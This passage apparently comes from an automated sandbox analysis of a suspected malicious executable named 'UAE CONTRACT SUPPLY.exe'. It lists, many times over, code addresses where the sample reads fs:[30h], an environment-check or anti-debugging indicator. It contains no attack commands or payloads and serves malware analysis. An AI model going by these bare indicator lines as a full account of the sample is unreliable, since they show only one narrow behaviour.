      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5037F5 mov eax, dword ptr fs:[00000030h]3_2_1E5037F5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547794 mov eax, dword ptr fs:[00000030h]3_2_1E547794
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547794 mov eax, dword ptr fs:[00000030h]3_2_1E547794
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547794 mov eax, dword ptr fs:[00000030h]3_2_1E547794
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D8794 mov eax, dword ptr fs:[00000030h]3_2_1E4D8794
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA44B mov eax, dword ptr fs:[00000030h]3_2_1E4FA44B
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55C450 mov eax, dword ptr fs:[00000030h]3_2_1E55C450
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55C450 mov eax, dword ptr fs:[00000030h]3_2_1E55C450
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E746D mov eax, dword ptr fs:[00000030h]3_2_1E4E746D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59740D mov eax, dword ptr fs:[00000030h]3_2_1E59740D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59740D mov eax, dword ptr fs:[00000030h]3_2_1E59740D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59740D mov eax, dword ptr fs:[00000030h]3_2_1E59740D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]3_2_1E581C06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]3_2_1E546C0A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]3_2_1E546C0A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]3_2_1E546C0A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]3_2_1E546C0A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FBC2C mov eax, dword ptr fs:[00000030h]3_2_1E4FBC2C
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598CD6 mov eax, dword ptr fs:[00000030h]3_2_1E598CD6
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5814FB mov eax, dword ptr fs:[00000030h]3_2_1E5814FB
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546CF0 mov eax, dword ptr fs:[00000030h]3_2_1E546CF0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546CF0 mov eax, dword ptr fs:[00000030h]3_2_1E546CF0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546CF0 mov eax, dword ptr fs:[00000030h]3_2_1E546CF0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D849B mov eax, dword ptr fs:[00000030h]3_2_1E4D849B
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E503D43 mov eax, dword ptr fs:[00000030h]3_2_1E503D43
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E543540 mov eax, dword ptr fs:[00000030h]3_2_1E543540
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E7D50 mov eax, dword ptr fs:[00000030h]3_2_1E4E7D50
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EC577 mov eax, dword ptr fs:[00000030h]3_2_1E4EC577
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EC577 mov eax, dword ptr fs:[00000030h]3_2_1E4EC577
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58E539 mov eax, dword ptr fs:[00000030h]3_2_1E58E539
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E54A537 mov eax, dword ptr fs:[00000030h]3_2_1E54A537
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598D34 mov eax, dword ptr fs:[00000030h]3_2_1E598D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4D3B mov eax, dword ptr fs:[00000030h]3_2_1E4F4D3B
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4D3B mov eax, dword ptr fs:[00000030h]3_2_1E4F4D3B
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4D3B mov eax, dword ptr fs:[00000030h]3_2_1E4F4D3B
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]3_2_1E4D3D34
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CAD30 mov eax, dword ptr fs:[00000030h]3_2_1E4CAD30
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]3_2_1E546DC9
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]3_2_1E546DC9
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]3_2_1E546DC9
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov ecx, dword ptr fs:[00000030h]3_2_1E546DC9
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]3_2_1E546DC9
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]3_2_1E546DC9
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E578DF1 mov eax, dword ptr fs:[00000030h]3_2_1E578DF1
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DD5E0 mov eax, dword ptr fs:[00000030h]3_2_1E4DD5E0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DD5E0 mov eax, dword ptr fs:[00000030h]3_2_1E4DD5E0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]3_2_1E58FDE2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]3_2_1E58FDE2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]3_2_1E58FDE2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]3_2_1E58FDE2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]3_2_1E4C2D8A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]3_2_1E4C2D8A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]3_2_1E4C2D8A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]3_2_1E4C2D8A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]3_2_1E4C2D8A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]3_2_1E4F2581
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]3_2_1E4F2581
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]3_2_1E4F2581
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]3_2_1E4F2581
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FFD9B mov eax, dword ptr fs:[00000030h]3_2_1E4FFD9B
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FFD9B mov eax, dword ptr fs:[00000030h]3_2_1E4FFD9B
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F35A1 mov eax, dword ptr fs:[00000030h]3_2_1E4F35A1
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5905AC mov eax, dword ptr fs:[00000030h]3_2_1E5905AC
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5905AC mov eax, dword ptr fs:[00000030h]3_2_1E5905AC
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F1DB5 mov eax, dword ptr fs:[00000030h]3_2_1E4F1DB5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F1DB5 mov eax, dword ptr fs:[00000030h]3_2_1E4F1DB5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F1DB5 mov eax, dword ptr fs:[00000030h]3_2_1E4F1DB5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E554257 mov eax, dword ptr fs:[00000030h]3_2_1E554257
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]3_2_1E4C9240
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]3_2_1E4C9240
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]3_2_1E4C9240
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]3_2_1E4C9240
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58EA55 mov eax, dword ptr fs:[00000030h]3_2_1E58EA55
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E50927A mov eax, dword ptr fs:[00000030h]3_2_1E50927A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57B260 mov eax, dword ptr fs:[00000030h]3_2_1E57B260
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57B260 mov eax, dword ptr fs:[00000030h]3_2_1E57B260
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598A62 mov eax, dword ptr fs:[00000030h]3_2_1E598A62
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D8A0A mov eax, dword ptr fs:[00000030h]3_2_1E4D8A0A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58AA16 mov eax, dword ptr fs:[00000030h]3_2_1E58AA16
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58AA16 mov eax, dword ptr fs:[00000030h]3_2_1E58AA16
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E3A1C mov eax, dword ptr fs:[00000030h]3_2_1E4E3A1C
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CAA16 mov eax, dword ptr fs:[00000030h]3_2_1E4CAA16
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CAA16 mov eax, dword ptr fs:[00000030h]3_2_1E4CAA16
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C5210 mov eax, dword ptr fs:[00000030h]3_2_1E4C5210
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C5210 mov ecx, dword ptr fs:[00000030h]3_2_1E4C5210
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C5210 mov eax, dword ptr fs:[00000030h]3_2_1E4C5210
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C5210 mov eax, dword ptr fs:[00000030h]3_2_1E4C5210
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E504A2C mov eax, dword ptr fs:[00000030h]3_2_1E504A2C
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E504A2C mov eax, dword ptr fs:[00000030h]3_2_1E504A2C
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2ACB mov eax, dword ptr fs:[00000030h]3_2_1E4F2ACB
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2AE4 mov eax, dword ptr fs:[00000030h]3_2_1E4F2AE4
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FD294 mov eax, dword ptr fs:[00000030h]3_2_1E4FD294
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FD294 mov eax, dword ptr fs:[00000030h]3_2_1E4FD294
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]3_2_1E4C52A5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]3_2_1E4C52A5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]3_2_1E4C52A5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]3_2_1E4C52A5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]3_2_1E4C52A5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DAAB0 mov eax, dword ptr fs:[00000030h]3_2_1E4DAAB0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DAAB0 mov eax, dword ptr fs:[00000030h]3_2_1E4DAAB0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FFAB0 mov eax, dword ptr fs:[00000030h]3_2_1E4FFAB0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598B58 mov eax, dword ptr fs:[00000030h]3_2_1E598B58
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CDB40 mov eax, dword ptr fs:[00000030h]3_2_1E4CDB40
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CF358 mov eax, dword ptr fs:[00000030h]3_2_1E4CF358
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CDB60 mov ecx, dword ptr fs:[00000030h]3_2_1E4CDB60
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F3B7A mov eax, dword ptr fs:[00000030h]3_2_1E4F3B7A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F3B7A mov eax, dword ptr fs:[00000030h]3_2_1E4F3B7A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58131B mov eax, dword ptr fs:[00000030h]3_2_1E58131B
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5453CA mov eax, dword ptr fs:[00000030h]3_2_1E5453CA
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5453CA mov eax, dword ptr fs:[00000030h]3_2_1E5453CA
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EDBE9 mov eax, dword ptr fs:[00000030h]3_2_1E4EDBE9
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]3_2_1E4F03E2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]3_2_1E4F03E2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]3_2_1E4F03E2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]3_2_1E4F03E2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]3_2_1E4F03E2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]3_2_1E4F03E2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D1B8F mov eax, dword ptr fs:[00000030h]3_2_1E4D1B8F
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D1B8F mov eax, dword ptr fs:[00000030h]3_2_1E4D1B8F
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58138A mov eax, dword ptr fs:[00000030h]3_2_1E58138A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57D380 mov ecx, dword ptr fs:[00000030h]3_2_1E57D380
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2397 mov eax, dword ptr fs:[00000030h]3_2_1E4F2397
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FB390 mov eax, dword ptr fs:[00000030h]3_2_1E4FB390
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4BAD mov eax, dword ptr fs:[00000030h]3_2_1E4F4BAD
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4BAD mov eax, dword ptr fs:[00000030h]3_2_1E4F4BAD
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F4BAD mov eax, dword ptr fs:[00000030h]3_2_1E4F4BAD
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E595BA5 mov eax, dword ptr fs:[00000030h]3_2_1E595BA5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E0050 mov eax, dword ptr fs:[00000030h]3_2_1E4E0050
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E0050 mov eax, dword ptr fs:[00000030h]3_2_1E4E0050
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E582073 mov eax, dword ptr fs:[00000030h]3_2_1E582073
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E591074 mov eax, dword ptr fs:[00000030h]3_2_1E591074
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]3_2_1E547016
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]3_2_1E547016
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]3_2_1E547016
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E594015 mov eax, dword ptr fs:[00000030h]3_2_1E594015
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E594015 mov eax, dword ptr fs:[00000030h]3_2_1E594015
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]3_2_1E4F002D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]3_2_1E4F002D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]3_2_1E4F002D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]3_2_1E4F002D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]3_2_1E4F002D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]3_2_1E4DB02A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]3_2_1E4DB02A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]3_2_1E4DB02A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]3_2_1E4DB02A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]3_2_1E55B8D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov ecx, dword ptr fs:[00000030h]3_2_1E55B8D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]3_2_1E55B8D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]3_2_1E55B8D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]3_2_1E55B8D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]3_2_1E55B8D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C58EC mov eax, dword ptr fs:[00000030h]3_2_1E4C58EC
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9080 mov eax, dword ptr fs:[00000030h]3_2_1E4C9080
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E543884 mov eax, dword ptr fs:[00000030h]3_2_1E543884
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E543884 mov eax, dword ptr fs:[00000030h]3_2_1E543884
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]3_2_1E4F20A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]3_2_1E4F20A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]3_2_1E4F20A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]3_2_1E4F20A0
